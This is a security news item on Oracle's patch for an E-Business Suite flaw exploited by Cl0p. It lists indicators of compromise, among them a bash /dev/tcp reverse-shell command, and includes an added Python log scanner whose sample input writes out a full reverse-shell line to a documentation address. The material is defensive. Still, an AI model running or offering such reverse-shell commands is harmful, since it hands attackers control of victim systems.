Oracle released an emergency update to fix a critical security flaw in its E-Business Suite. The company confirmed that the vulnerability was exploited in the recent wave of Cl0p data-theft attacks.
The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), involves an unspecified bug that allows an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component.
“This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password,” Oracle said in an advisory. “If successfully exploited, this vulnerability may result in remote code execution.”
In a separate alert, Oracle’s Chief Security Officer Rob Duhart explained that the company released fixes for CVE-2025-61882 to “provide updates against additional potential exploitation that were discovered during our investigation.”
As part of its analysis, Oracle shared several indicators of compromise (IoCs). These include IP addresses and artifacts that point to possible involvement by the Scattered LAPSUS$ Hunters group in the exploit:
- 200.107.207[.]26 (Potential GET and POST activity)
- 185.181.60[.]11 (Potential GET and POST activity)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Establishes an outbound TCP connection over a specific port)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
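As an added illustration, not part of the original article or of Oracle's advisory, the following Python script sweeps constructed web-server access-log and process-audit lines for the indicators listed above (the advisory's IP addresses and its bash reverse-shell command pattern). The log layout, the audit-line format and the sample request paths are assumptions; the host and port in the reverse-shell pattern are matched generically because the advisory elides them.

```python
import re
from dataclasses import dataclass

# IoC IP addresses from Oracle's advisory, kept defanged as published;
# the "[.]" publication convention is re-fanged before matching.
DEFANGED_IOC_IPS = ["200.107.207[.]26", "185.181.60[.]11"]
IOC_IPS = {ip.replace("[.]", ".") for ip in DEFANGED_IOC_IPS}

# Reverse-shell pattern from the advisory: interactive bash redirected over /dev/tcp.
# Host and port are matched generically (\S*) because the advisory elides them.
REVSHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/\S*\s+0>&1")

# Assumed Apache/Nginx "combined" access-log layout: client IP first, then
# the request line in quotes (method and path are all we need here).
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)')

@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    detail: str

def scan_lines(lines):
    """Return one Finding per line that carries one of the advisory's IoCs."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = ACCESS_RE.match(line)
        if m and m.group("ip") in IOC_IPS:
            detail = f'{m.group("ip")} {m.group("method")} {m.group("path")}'
            findings.append(Finding(n, "ioc_ip", detail))
        if REVSHELL_RE.search(line):
            findings.append(Finding(n, "reverse_shell_cmd", line.strip()))
    return findings

# Constructed sample input: two access-log lines and one process-audit line.
# Paths are placeholders, not the endpoint involved in the vulnerability.
SAMPLE_LINES = [
    '10.0.0.5 - - [05/Oct/2025:10:01:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512',
    '200.107.207.26 - - [05/Oct/2025:10:02:11 +0000] "POST /OA_HTML/example.jsp HTTP/1.1" 200 88',
    'audit: user=applmgr cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.reason}: {f.detail}")
```

Feed real access logs and process-audit output line by line in place of SAMPLE_LINES; a match on either indicator is a lead for investigation, not proof of compromise on its own.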
Furthermore, news of the Oracle zero-day surfaced only days after reports revealed a new campaign, likely carried out by the Cl0p ransomware group, targeting Oracle E-Business Suite. Google-owned Mandiant described this operation as a “high-volume email campaign” launched from hundreds of compromised accounts.
In a LinkedIn post, Charles Carmakal, CTO of Mandiant at Google Cloud, stated that “Cl0p exploited multiple vulnerabilities in Oracle EBS which enabled them to steal large amounts of data from several victims in August 2025,” adding that “multiple vulnerabilities were exploited including vulnerabilities that were patched in Oracle’s July 2025 update as well as one that was patched this weekend (CVE-2025-61882).”
Carmakal emphasized the urgency of response, noting, “Given the broad mass zero-day exploitation that has already occurred (and the n-day exploitation that will likely continue by other actors), irrespective of when the patch is applied, organizations should examine whether they were already compromised.”
Source: TheHackerNews